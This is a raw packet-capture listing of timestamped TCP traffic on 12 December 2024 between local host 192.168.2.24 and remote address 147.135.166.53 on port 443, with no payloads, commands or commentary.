                                                                                                          Dec 12, 2024 12:58:20.370227098 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.370265007 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.449563026 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.449574947 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.449611902 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.449629068 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.449654102 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.449687004 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.449708939 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.461273909 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.461338043 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.461364031 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.461395025 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.461426973 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.461513996 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.486025095 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.486082077 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.486108065 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.486138105 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.486171961 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.486195087 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.486243010 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.486291885 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.486659050 CET49836443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.486689091 CET44349836147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.498291016 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.498318911 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.498363972 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.498384953 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.498410940 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.498601913 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.558360100 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.560851097 CET49843443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.560873032 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.561999083 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.563570976 CET49843443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.563745975 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.565349102 CET49843443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.607337952 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.627634048 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.627669096 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.627736092 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.627748013 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.627764940 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.627779961 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.652241945 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.657314062 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.657371998 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.657396078 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.657407045 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.657439947 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.657532930 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.657672882 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.657877922 CET49835443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.657896996 CET44349835147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.693209887 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.773972988 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.773982048 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.774050951 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.774080992 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.774128914 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.774169922 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.774194002 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.774230957 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.774230957 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.774230957 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.774230957 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.774230957 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.889168024 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.889199972 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.889261007 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.889280081 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.889303923 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.889318943 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.958012104 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.958034992 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.958101034 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:20.958112001 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:20.960140944 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.020744085 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.020992041 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.021013021 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.021774054 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.022231102 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.022361040 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.022361040 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.034739971 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.034869909 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.034950018 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.035244942 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.035288095 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.054583073 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.054610014 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.054678917 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.054693937 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.054778099 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.067329884 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.072051048 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.072261095 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.072391987 CET49843443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.073889971 CET49843443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.073934078 CET44349843147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.075222969 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.080568075 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.080591917 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.080651045 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.080662966 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.080686092 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.080861092 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.084914923 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.084953070 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.085032940 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.085231066 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.085321903 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.085403919 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.086097956 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.086112022 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.086483002 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.086524963 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.104868889 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.104890108 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.104959011 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.105021954 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.105081081 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.157860041 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.157881975 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.157955885 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.157979012 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.158090115 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.237334013 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.237379074 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.237396955 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.237417936 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.237466097 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.237466097 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.252815008 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.252835035 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.252909899 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.252926111 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.252996922 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.266392946 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.266412020 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.266470909 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.266484022 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.266766071 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.281358004 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.281399012 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.281443119 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.281472921 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.281522989 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.281789064 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.294044971 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.294089079 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.294125080 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.294138908 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.294183016 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.294379950 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.301228046 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.301337957 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.301436901 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.301955938 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.301997900 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.306143045 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.306165934 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.306248903 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.306262970 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.306482077 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.349023104 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.349047899 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.349117041 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.349139929 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.349174976 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.349214077 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.424037933 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.424072981 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.424134970 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.424166918 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.424197912 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.424230099 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.433047056 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.433065891 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.433137894 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.433155060 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.433204889 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.440331936 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.440350056 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.440402985 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.440412045 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.440454006 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.448574066 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.448594093 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.448646069 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.448662043 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.448803902 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.456906080 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.456923962 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.456979036 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.456995964 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.457309008 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.464679003 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.464699030 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.464764118 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.464778900 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.464875937 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.469363928 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.469429970 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.469439030 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.469460964 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.469505072 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.469978094 CET49842443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.469997883 CET44349842147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.541049004 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.585896969 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.624314070 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.624327898 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.624398947 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.624398947 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.624438047 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.624478102 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.624492884 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.624505997 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.624505997 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.624520063 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.624540091 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.773289919 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.773329973 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.773581028 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.773622990 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.773642063 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.773648977 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.773679972 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.773699999 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.794095039 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.794188976 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.794204950 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.794312000 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.794368029 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.794707060 CET49844443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.794739962 CET44349844147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.938582897 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.938853025 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.938889980 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.939388037 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.939759016 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.939851999 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.939909935 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:21.983329058 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:21.986233950 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.454134941 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.498233080 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.574485064 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.574497938 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.574527979 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.574542046 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.574553013 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.574556112 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.574577093 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.574599028 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.574656963 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.654578924 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.654982090 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.654993057 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.655287027 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.655814886 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.655868053 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.655982018 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.688107014 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.688139915 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.688199043 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.688199043 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.688234091 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.688257933 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.688257933 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.688306093 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.699328899 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.764198065 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.764260054 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.764295101 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.764347076 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.764389992 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.764390945 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.805032969 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.805458069 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.805512905 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.806039095 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.806480885 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.806581974 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.806612968 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.850240946 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.850302935 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.853971004 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.854326010 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.854387999 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.857628107 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.857702971 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.857790947 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.857844114 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.857872009 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.857916117 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.857942104 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.857970953 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.858069897 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.858161926 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.858447075 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.858509064 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.876590014 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.876945019 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.877007008 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.878829002 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.878909111 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.879360914 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.879439116 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.879518986 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.883253098 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.883348942 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.883371115 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.883383036 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.883438110 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.898360968 CET49849443192.168.2.24147.135.166.53
